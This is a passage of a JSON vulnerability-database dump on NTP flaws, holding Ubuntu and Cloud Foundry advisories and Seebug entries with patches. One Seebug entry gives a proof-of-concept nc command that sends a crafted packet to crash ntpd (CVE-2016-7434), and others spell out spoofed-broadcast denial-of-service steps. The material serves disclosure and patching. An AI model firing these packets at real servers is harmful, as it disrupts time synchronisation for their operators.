Ubuntu 14.04 \nLTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-9311)\n\nIt was discovered that NTP incorrectly handled memory when processing long \nvariables. A remote authenticated user could possibly use this issue to \ncause NTP to crash, resulting in a denial of service. (CVE-2017-6458)\n\nIt was discovered that NTP incorrectly handled memory when processing long \nvariables. A remote authenticated user could possibly use this issue to \ncause NTP to crash, resulting in a denial of service. This issue only \napplied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. (CVE-2017-6460)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly \nhandled the /dev/datum device. A local attacker could possibly use this \nissue to cause a denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings \nin a :config directive. A remote authenticated user could possibly use \nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6463)\n\nIt was discovered that NTP incorrectly handled certain invalid mode \nconfiguration directives. A remote authenticated user could possibly use \nthis issue to cause NTP to crash, resulting in a denial of service. \n(CVE-2017-6464)", "edition": 5, "modified": "2017-07-05T00:00:00", "published": "2017-07-05T00:00:00", "id": "USN-3349-1", "href": "https://ubuntu.com/security/notices/USN-3349-1", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2018-7185", "CVE-2018-7183", "CVE-2016-7427", "CVE-2017-6462", "CVE-2017-6463", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426"], "description": "USN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This update \nprovides the corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed \naddresses when performing rate limiting. A remote attacker could possibly \nuse this issue to perform a denial of service. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted \nbroadcast mode packets. A remote attacker could possibly use this issue to \nperform a denial of service. (CVE-2016-7427, CVE-2016-7428)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control \nmode packets. A remote attacker could use this issue to set or unset traps. \n(CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. \nA remote attacker could possibly use this issue to cause NTP to crash, resulting \nin a denial of service. (CVE-2016-9311)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly handled \nthe /dev/datum device. A local attacker could possibly use this issue to cause \na denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings in a \n:config directive. A remote authenticated user could possibly use this issue \nto cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2018-7185)", "edition": 4, "modified": "2019-01-23T00:00:00", "published": "2019-01-23T00:00:00", "id": "USN-3707-2", "href": "https://ubuntu.com/security/notices/USN-3707-2", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:33:04", "bulletinFamily": "software", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2017-6460", "CVE-2016-7433", "CVE-2017-6458", "CVE-2016-7427", "CVE-2016-9042", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-2519", "CVE-2016-7428", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426", "CVE-2016-7431"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nYihan Lian discovered that NTP incorrectly handled certain large request data values. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS. ([CVE-2016-2519](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-2519>))\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed addresses when performing rate limiting. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. ([CVE-2016-7426](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7426>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted broadcast mode packets. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. ([CVE-2016-7427](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7427>), [CVE-2016-7428](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7428>))\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 16.10. ([CVE-2016-7429](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7429>))\n\nSharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly handled origin timestamps of zero. A remote attacker could possibly use this issue to bypass the origin timestamp protection mechanism. This issue only affected Ubuntu 16.10. ([CVE-2016-7431](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7431>))\n\nBrian Utterback, Sharon Goldberg and Aanchal Malhotra discovered that NTP incorrectly performed initial sync calculations. This issue only applied to Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7433](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7433>))\n\nMagnus Stubman discovered that NTP incorrectly handled certain mrulist queries. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only affected Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-7434](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7434>))\n\nMatthew Van Gund discovered that NTP incorrectly handled origin timestamp checks. A remote attacker could possibly use this issue to perform a denial of service. This issue only affected Ubuntu Ubuntu 16.10, and Ubuntu 17.04. ([CVE-2016-9042](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9042>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control mode packets. A remote attacker could use this issue to set or unset traps. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-9310](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9310>))\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. A remote attacker could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. ([CVE-2016-9311](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9311>))\n\nIt was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. ([CVE-2017-6458](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6458>))\n\nIt was discovered that NTP incorrectly handled memory when processing long variables. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. This issue only applied to Ubuntu 16.04 LTS, Ubuntu 16.10 and Ubuntu 17.04. ([CVE-2017-6460](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6460>))\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly handled the /dev/datum device. A local attacker could possibly use this issue to cause a denial of service. ([CVE-2017-6462](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6462>))\n\nIt was discovered that NTP incorrectly handled certain invalid settings in a :config directive. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. ([CVE-2017-6463](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6463>))\n\nIt was discovered that NTP incorrectly handled certain invalid mode configuration directives. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. ([CVE-2017-6464](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6464>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.32\n * 3363.x versions prior to 3363.29\n * 3421.x versions prior to 3421.18\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.137.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions prior to 3312.32\n * Upgrade 3363.x versions prior to 3363.29\n * Upgrade 3421.x versions prior to 3421.18\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.137.0 or later.\n\n# References\n\n * [USN-3349-1](<http://www.ubuntu.com/usn/usn-3349-1/>)\n * [CVE-2016-2519](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-2519>)\n * [CVE-2016-7426](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7426>)\n * [CVE-2016-7427](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7427>)\n * [CVE-2016-7428](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7428>)\n * [CVE-2016-7429](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7429>)\n * [CVE-2016-7431](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7431>)\n * [CVE-2016-7433](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7433>)\n * [CVE-2016-7434](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-7434>)\n * [CVE-2016-9042](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9042>)\n * [CVE-2016-9310](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9310>)\n * [CVE-2016-9311](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2016-9311>)\n * [CVE-2017-6458](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6458>)\n * [CVE-2017-6460](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6460>)\n * [CVE-2017-6462](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6462>)\n * [CVE-2017-6463](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6463>)\n * [CVE-2017-6464](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-6464>)\n", "edition": 5, "modified": "2017-08-04T00:00:00", "published": "2017-08-04T00:00:00", "id": "CFOUNDRY:8722C197C1671303FFCA9E919368B734", "href": "https://www.cloudfoundry.org/blog/usn-3349-1/", "title": "USN-3349-1: NTP vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:42", "description": "poc\r\n\r\n```\r\necho \"FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY\"\\ \r\n| \"WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=\" | base64 -d | nc -u -v 127.0.0.1 123 \r\n```\r\n\r\nValgrind report\r\n\r\n```\r\n$ sudo valgrind ./ntpd/ntpd -n -c ~/resources/ntp.conf |\r\n| ==5389== Memcheck, a memory error detector |\r\n| ==5389== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. |\r\n| ==5389== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info |\r\n| ==5389== Command: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf |\r\n| ==5389== |\r\n| 25 Jun 23:07:05 ntpd[5389]: ntpd 4.2.8p8@1.3265-o Sat Jun 25 20:50:30 UTC 2016 (1): Starting |\r\n| 25 Jun 23:07:05 ntpd[5389]: Command line: ./ntpd/ntpd -n -c /home/dude/resources/ntp.conf |\r\n| 25 Jun 23:07:06 ntpd[5389]: proto: precision = 3.605 usec (-18) |\r\n| 25 Jun 23:07:06 ntpd[5389]: switching logging to file /dev/null |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 0 ^6wildcard [::]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen and drop on 1 v4wildcard 0.0.0.0:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 2 lo 127.0.0.1:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 3 eth0 10.0.1.11:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 4 eth0:0 1.2.3.4:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 5 eth9:0 11.11.11.11:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 6 lo [::1]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 7 eth0 [fe80::f2de:f1ff:fe85:75cf%2]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listen normally on 8 eth9 [fe80::a450:8eff:fecc:9c4%3]:123 |\r\n| 25 Jun 23:07:06 ntpd[5389]: Listening on routing socket on fd #25 for interface updates |\r\n| ==5389== Invalid read of size 1 |\r\n| ==5389== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) |\r\n| ==5389== by 0x45704D: estrdup_impl (emalloc.c:128) |\r\n| ==5389== by 0x41AF29: read_mru_list (ntp_control.c:4041) |\r\n| ==5389== by 0x42BB09: receive (ntp_proto.c:659) |\r\n| ==5389== by 0x4145CF: ntpdmain (ntpd.c:1329) |\r\n| ==5389== by 0x405A58: main (ntpd.c:392) |\r\n| ==5389== Address 0x0 is not stack'd, malloc'd or (recently) free'd |\r\n| ==5389== |\r\n| ==5389== |\r\n| ==5389== Process terminating with default action of signal 11 (SIGSEGV) |\r\n| ==5389== Access not within mapped region at address 0x0 |\r\n| ==5389== at 0x4C2C1A2: strlen (vg_replace_strmem.c:412) |\r\n| ==5389== by 0x45704D: estrdup_impl (emalloc.c:128) |\r\n| ==5389== by 0x41AF29: read_mru_list (ntp_control.c:4041) |\r\n| ==5389== by 0x42BB09: receive (ntp_proto.c:659) |\r\n| ==5389== by 0x4145CF: ntpdmain (ntpd.c:1329) |\r\n| ==5389== by 0x405A58: main (ntpd.c:392) |\r\n| ==5389== If you believe this happened as a result of a stack |\r\n| ==5389== overflow in your program's main thread (unlikely but |\r\n| ==5389== possible), you can try to increase the size of the |\r\n| ==5389== main thread stack using the --main-stacksize= flag. |\r\n| ==5389== The main thread stack size used in this run was 204800. |\r\n| ==5389== |\r\n| ==5389== HEAP SUMMARY: |\r\n| ==5389== in use at exit: 122,458 bytes in 2,707 blocks |\r\n| ==5389== total heap usage: 2,875 allocs, 168 frees, 411,190 bytes allocated |\r\n| ==5389== |\r\n| ==5389== LEAK SUMMARY: |\r\n| ==5389== definitely lost: 0 bytes in 0 blocks |\r\n| ==5389== indirectly lost: 0 bytes in 0 blocks |\r\n| ==5389== possibly lost: 2,000 bytes in 2 blocks |\r\n| ==5389== still reachable: 120,458 bytes in 2,705 blocks |\r\n| ==5389== suppressed: 0 bytes in 0 blocks |\r\n| ==5389== Rerun with --leak-check=full to see details of leaked memory |\r\n| ==5389== |\r\n| ==5389== For counts of detected and suppressed errors, rerun with: -> |\r\n| ==5389== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) \r\n```\r\n\r\nntp.conf\r\n\r\n```\r\n| server 127.127.1.0 prefer |\r\n| fudge 127.127.1.0 stratum 10 |\r\n| driftfile /var/lib/ntp/drift |\r\n| broadcastdelay 0.008 |\r\n| |\r\n| logfile /dev/null |\r\n| |\r\n| restrict 127.0.0.1 mask 255.255.255.255 nomodify notrap |\r\n```", "published": "2016-11-23T00:00:00", "type": "seebug", "title": "ntpd remote pre-auth DoS (CVE-2016-7434)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7434"], "modified": "2016-11-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92551", "id": "SSV:92551", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:01:01", "description": "### Summary\r\nAn exploitable denial of service vulnerability exists in the broadcast mode replay prevention functionality of ntpd. To prevent replay of broadcast mode packets, ntpd rejects broadcast mode packets with non-monotonically increasing transmit timestamps. Remote unauthenticated attackers can send specially crafted broadcast mode NTP packets to cause ntpd to reject all broadcast mode packets from legitimate NTP broadcast servers.\r\n\r\n### Tested Versions\r\nNTP 4.2.8p6\r\n\r\n### Product URLs\r\nhttp://www.ntp.org/\r\n\r\n### CVSS Scores\r\nCVSSv2: 5.0 - (AV:N/AC:L/Au:N/C:N/I:N/A:P)\r\nCVSSv3: 5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\r\n\r\n### Details\r\nIn response to the NTP Deja Vu vulnerability (CVE-2015-7973), ntp-4.2.8p6 introduced several new integrity checks on incoming broadcast mode packets. Upon receipt of a broadcast mode packet, before authentication is enforced, ntpd will reject the packet if any of the following conditions hold:\r\n\r\n1. The packet poll value is out of bounds for the broadcast association, i.e.\r\n```\r\n pkt->ppoll < peer->minpoll || pkt->ppoll > peer->maxpoll\r\n```\r\n2. The packet was received before a full poll interval has elapsed since the last broadcast packet was received from the packet's sender. i.e. A server cannot ingress packets more frequently than `peer->minpoll`.\r\n\r\n3. The packet transmit timestamp is less than the last seen broadcast packet transmit timestamp from the packet's sender. i.e. Broadcast packet transmit timestamps must be monotonically increasing.\r\n\r\nThe following logic is used to ensure that packet transmit timestamps are monotonically increasing:\r\n```\r\n/* ntp-4.2.8p6 ntpd/ntp_proto.c */\r\n1305 if (MODE_BROADCAST == hismode) {\r\n...\r\n1351 tdiff = p_xmt;\r\n1352 L_SUB(&tdiff, &peer->bxmt);\r\n1353 if (tdiff.l_i < 0) {\r\n1354 msyslog(LOG_INFO, \"receive: broadcast packet from %s contains non-monotonic timestamp: %#010x.%08x -> %#010x.%08x\",\r\n1355 stoa(&rbufp->recv_srcadr),\r\n1356 peer->bxmt.l_ui, peer->bxmt.l_uf,\r\n1357 p_xmt.l_ui, p_xmt.l_uf\r\n1358 );\r\n1359 ++bail;\r\n1360 }\r\n1361\r\n1362 peer->bxmt = p_xmt;\r\n1363\r\n1364 if (bail) {\r\n1365 peer->timelastrec = current_time;\r\n1366 sys_declined++;\r\n1367 return;\r\n1368 }\r\n1369 }\r\n```\r\n\r\nIf the packet transmit timestamp is less than the transmit timestamp on the last received broadcast packet from this association (`p_xmt - peer->bxmt < 0`), the packet will be discarded.\r\n\r\nUnfortunately, line 1362 updates the saved transmit timestamp for alleged sender of the packet (`peer->bxmt`) before the packet is discarded. The update takes place even if the packet is unauthenticated and fails the previous integrity checks.\r\n\r\nThis leads to a trivial denial of service attack. The attacker:\r\n\r\n1. Discovers the IP address of the victim's broadcast server. e.g. Send the victim a client mode NTP packet and discover the broadcast server from the refid field of the victim's reply.\r\n2. Every poll period, send the victim a spoofed broadcast mode packet from the broadcast server with a transmit timestamp in the future. This will move `peer->bxmt` forward so that any legitimate packet will be rejected by the non-monotonic timestamp check.\r\n\t* The attacker does not need to be on the same subnet as the victim. The attacker can address the spoofed broadcast NTP packet directly to the victim's IP address.\r\n\t* The attacker can choose any reasonably small estimate for the poll period. Because the `peer->bxmt` update happens even when a packet fails the poll period checks, there is no penalty for sending packets too frequently.\r\n\r\nTo prevent this vulnerability, `peer->bxmt` should only be updated when a packet authenticates correctly. This is the approach taken in the patch below.\r\n\r\n### Mitigation\r\nThere is no workaround for this issue. Because the vulnerable logic is executed before authentication is enforced, authentication and the `restrict notrust` ntpd.conf directive have no effect. An attacker can bypass `notrust` restrictions by sending incorrectly authenticated packets.\r\n\r\nIn order to succeed in an attack, the attacker must send at least one spoofed packet per poll period. Therefore observing more than one NTP broadcast packet from the same sender address per poll period indicates a possible attack.\r\n\r\nThe following patch can be used to fix this vulnerability:\r\n```\r\nFrom 097fd4dae9ac4927d7cfa8011fd42f704bd02c45 Mon Sep 17 00:00:00 2001\r\nFrom: Matthew Van Gundy <mvangund@cisco.com>\r\nDate: Tue, 26 Jan 2016 15:00:28 -0500\r\nSubject: [PATCH] Fix unauthenticated broadcast mode denial of service (peer->bxmt)\r\n\r\n---\r\n include/ntp_fp.h | 1 +\r\n ntpd/ntp_proto.c | 22 ++++++++++++++++------\r\n 2 files changed, 17 insertions(+), 6 deletions(-)\r\n\r\ndiff --git a/include/ntp_fp.h b/include/ntp_fp.h\r\nindex 7806932..ad7a01d 100644\r\n--- a/include/ntp_fp.h\r\n+++ b/include/ntp_fp.h\r\n@@ -242,6 +242,7 @@ typedef u_int32 u_fp;\r\n #define L_ISGTU(a, b) M_ISGTU((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n #define L_ISHIS(a, b) M_ISHIS((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n #define L_ISGEQ(a, b) M_ISGEQ((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n+#define L_ISGEQU(a, b) L_ISHIS(a, b)\r\n #define L_ISEQU(a, b) M_ISEQU((a)->l_ui, (a)->l_uf, (b)->l_ui, (b)->l_uf)\r\n\r\n /*\r\ndiff --git a/ntpd/ntp_proto.c b/ntpd/ntp_proto.c\r\nindex ad45409..ac469ce 100644\r\n--- a/ntpd/ntp_proto.c\r\n+++ b/ntpd/ntp_proto.c\r\n@@ -1305,7 +1305,6 @@ receive(\r\n if (MODE_BROADCAST == hismode) {\r\n u_char poll;\r\n int bail = 0;\r\n- l_fp tdiff;\r\n\r\n DPRINTF(2, (\"receive: PROCPKT/BROADCAST: prev pkt %ld seconds ago, ppoll: %d, %d secs\\n\",\r\n (current_time - peer->timelastrec),\r\n@@ -1348,9 +1347,8 @@ receive(\r\n ++bail;\r\n }\r\n\r\n- tdiff = p_xmt;\r\n- L_SUB(&tdiff, &peer->bxmt);\r\n- if (tdiff.l_i < 0) {\r\n+ /* Use L_ISGEQU() to ensure unsigned comparison */\r\n+ if (!L_ISGEQU(&p_xmt, &peer->bxmt)) {\r\n msyslog(LOG_INFO, \"receive: broadcast packet from %s contains non-monotonic timestamp: %#010x.%08x -> %#010x.%08x\",\r\n stoa(&rbufp->recv_srcadr),\r\n peer->bxmt.l_ui, peer->bxmt.l_uf,\r\n@@ -1359,8 +1357,6 @@ receive(\r\n ++bail;\r\n }\r\n\r\n- peer->bxmt = p_xmt;\r\n-\r\n if (bail) {\r\n peer->timelastrec = current_time;\r\n sys_declined++;\r\n@@ -1563,6 +1559,14 @@ receive(\r\n peer->xmt = p_xmt;\r\n\r\n /*\r\n+ * Now that we know the packet is correctly authenticated,\r\n+ * update peer->bxmt if needed\r\n+ */\r\n+ if (MODE_BROADCAST == hismode) {\r\n+ peer->bxmt = p_xmt;\r\n+ }\r\n+\r\n+ /*\r\n * Set the peer ppoll to the maximum of the packet ppoll and the\r\n * peer minpoll. If a kiss-o'-death, set the peer minpoll to\r\n * this maximum and advance the headway to give the sender some\r\n@@ -2400,6 +2404,7 @@ peer_clear(\r\n )\r\n {\r\n u_char u;\r\n+ l_fp bxmt = peer->bxmt;\r\n\r\n #ifdef AUTOKEY\r\n /*\r\n@@ -2436,6 +2441,11 @@ peer_clear(\r\n peer->flash = peer_unfit(peer);\r\n peer->jitter = LOGTOD(sys_precision);\r\n\r\n+ /* Don't throw away our broadcast replay protection */\r\n+ if (peer->hmode == MODE_BCLIENT) {\r\n+ peer->bxmt = bxmt;\r\n+ }\r\n+\r\n /*\r\n * If interleave mode, initialize the alternate origin switch.\r\n */\r\n```\r\n\r\n### Timeline\r\n* 2016-09-12 - Vendor Disclosure\r\n* 2016-11-21 - Public Release", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "Network Time Protocol Broadcast Mode Replay Prevention Denial of Service Vulnerability(CVE-2016-7427)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7973", "CVE-2016-7427"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96650", "id": "SSV:96650", "sourceData": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T12:15:04", "description": "### Summary\r\nAn exploitable denial of service vulnerability exists in the broadcast mode poll interval enforcement functionality of ntpd. To limit abuse, ntpd restricts the rate at which each broadcast association will process incoming packets. ntpd will reject broadcast mode packets that arrive before the poll interval specified in the preceding broadcast packet expires. A vulnerability exists which allows remote unauthenticated attackers to send specially crafted broadcast mode NTP packets which will cause ntpd to reject all broadcast mode packets from legitimate NTP broadcast servers.\r\n\r\n### Tested Versions\r\nNTP 4.2.8p6\r\n\r\n### Product URLs\r\nhttp://www.ntp.org/\r\n\r\n### CVSS Scores\r\n* CVSSv2: 5.0 - (AV:N/AC:L/Au:N/C:N/I:N/A:P)\r\n* CVSSv3: 5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\r\n\r\n### Details\r\nIn response to the NTP Deja Vu vulnerability (CVE-2015-7973), ntp-4.2.8p6 introduced several new integrity checks on incoming broadcast mode packets. Upon receipt of a broadcast mode packet, before authentication is enforced, ntpd will reject the packet if any of the following conditions hold:\r\n\r\n1. The packet poll value is out of bounds for the broadcast association, i.e.\r\n```\r\n pkt->ppoll < peer->minpoll || pkt->ppoll > peer->maxpoll\r\n```\r\n \r\n2. The packet was received before a full poll interval has elapsed since the last broadcast packet was received from the packet's sender. i.e. A server cannot ingress packets more frequently than `peer->minpoll`.\r\n3. The packet transmit timestamp is less than the last seen broadcast packet transmit timestamp from the packet's sender. i.e. Broadcast packet transmit timestamps must be monotonically increasing.\r\n\r\nThe following logic is used to ensure constraint 2, which ensures that broadcast associations will process only one incoming packet per poll interval:\r\n```\r\n/* ntp-4.2.8p6 ntpd/ntp_proto.c */\r\n1305 if (MODE_BROADCAST == hismode) {\r\n...\r\n1341 if ( (current_time - peer->timelastrec)\r\n1342 < (1 << pkt->ppoll)) {\r\n1343 msyslog(LOG_INFO, \"receive: broadcast packet from %s arrived after %ld, not %d seconds!\",\r\n1344 stoa(&rbufp->recv_srcadr),\r\n1345 (current_time - peer->timelastrec),\r\n1346 (1 << pkt->ppoll)\r\n1347 );\r\n1348 ++bail;\r\n1349 }\r\n...\r\n1361\r\n1362 peer->bxmt = p_xmt;\r\n1363\r\n1364 if (bail) {\r\n1365 peer->timelastrec = current_time;\r\n1366 sys_declined++;\r\n1367 return;\r\n1368 }\r\n1369 }\r\n```\r\n\r\nIf the time elapsed since the last broadcast packet was received from this peer is less than the poll interval declared by the sender (`(current_time - peer->timelastrec) < (1 << pkt->ppoll)`), the packet will be discarded. (A previous check ensures that `pkt->ppoll` is within acceptable bounds.)\r\n\r\nUnfortunately, line 1341 compares the current time against the last time any broadcast mode packet was received with a source IP address of the peer (`peer->timelastrec`). In contrast to `peer->timereceived`, which is updated only when a clean (correctly authenticated and passing integrity checks) packet is received, `peer->timelastrec` is updated by all incoming broadcast packets including spoofed and replayed packets.\r\n\r\nThis leads to a trivial denial of service attack. The attacker:\r\n1. Discovers the IP address of the victim's broadcast server. e.g. Send the victim a client mode NTP packet and discover the broadcast server from the refid field of the victim's reply.\r\n2. At least once per poll period, send the victim a spoofed broadcast mode packet from the broadcast server. This will set `peer->timelastrec = current_time` such that, when a legitimate packet is received, it will appear to have been received too early (`(current_time - peer->timelastrec) < (1 << pkt->ppoll)`) and will be discarded.\r\n\t* The attacker does not need to be on the same subnet as the victim. The attacker can address the spoofed broadcast NTP packet directly to the victim's IP address.\r\n\t* The attacker can choose any reasonably small estimate for the poll period. Because the `peer->timelastrec` update happens even when a packet fails the poll period check, there is no penalty for sending packets too frequently.\r\n\r\n\r\nTo prevent this vulnerability, ntpd should only discard packets broadcast packets when less than one poll interval has elapsed since the last legitimate packet has been received (`peer->timereceived`).\r\n\r\n### Mitigation\r\nThere is no workaround for this issue. Because the vulnerable logic is executed before authentication is enforced, authentication and the `restrict notrust` ntpd.conf directive have no effect. An attacker can bypass `notrust` restrictions by sending incorrectly authenticated packets.\r\n\r\nIn order to succeed in an attack, the attacker must send at least one spoofed packet per poll period. Therefore observing more than one NTP broadcast packet from the same sender address per poll period indicates a possible attack.\r\n\r\nThe following patch can be used to fix this vulnerability:\r\n```\r\nFrom 8522882496d3df2bd764de6d8f7afac4a8d84006 Mon Sep 17 00:00:00 2001\r\nFrom: Matthew Van Gundy <mvangund@cisco.com>\r\nDate: Fri, 5 Feb 2016 17:38:32 -0500\r\nSubject: [PATCH] Fix unauthenticated broadcast mode denial of service (peer->timelastrec)\r\n\r\nDrop packets if they arrive less than one poll interval since the last\r\n**clean** packet received on an association. If we compare against the\r\nlast time that *any* packet was received, even one that will be dropped\r\nfor failing integrity checks, an attacker can DoS the association by\r\nsending incorrectly authenticated packets or replaying old packets to\r\nkeep bumping the peer->timelastrec timer forward.\r\n---\r\n include/ntp.h | 4 +++-\r\n ntpd/ntp_proto.c | 13 +++++++++++--\r\n 2 files changed, 14 insertions(+), 3 deletions(-)\r\n\r\ndiff --git a/include/ntp.h b/include/ntp.h\r\nindex 6a4e9aa..cbf6cec 100644\r\n--- 